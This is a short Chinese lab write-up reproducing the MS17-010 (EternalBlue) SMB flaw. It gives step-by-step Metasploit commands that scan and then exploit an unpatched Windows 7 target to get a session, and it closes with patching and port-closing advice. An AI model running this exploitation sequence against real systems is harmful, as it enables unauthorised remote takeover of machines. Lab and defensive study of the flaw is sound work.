【漏洞复现】那些年我们玩过的ms17-010(永恒之蓝)

简介

MS17-010(永恒之蓝)应用的不仅仅是一个漏洞,而是包含Windows SMB  远程代码执行漏洞CVE-2017-0143、CVE-2017-0144、CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148在内的6个SMB漏洞的攻击。

当我们在用namp扫除目标主机开放端口有445时,二话不说就是上MS17-010。

测试漏洞

靶机:未打过补丁的win7
打开metasploit

第一步:search smb_ms17_010

第二步:use auxiliary/scanner/smb/smb_ms17_010 

第三步:set RHOSTS 10.10.10.26,然后输入show options查看配置是否完成。

第四步:执行exploit,看到有攻击的可能性。

然后直接上:

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS 10.10.10.26

explot

最后,假如目标存在MS17-010漏洞,我们可以获取到session:

修复方案

1、为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,网址为https://technet.microsoft.com/zh-cn/library/security/MS17-010。

2、关闭445、135、137、138、139端口,关闭网络共享。

你可能感兴趣的:(【漏洞复现】那些年我们玩过的ms17-010(永恒之蓝))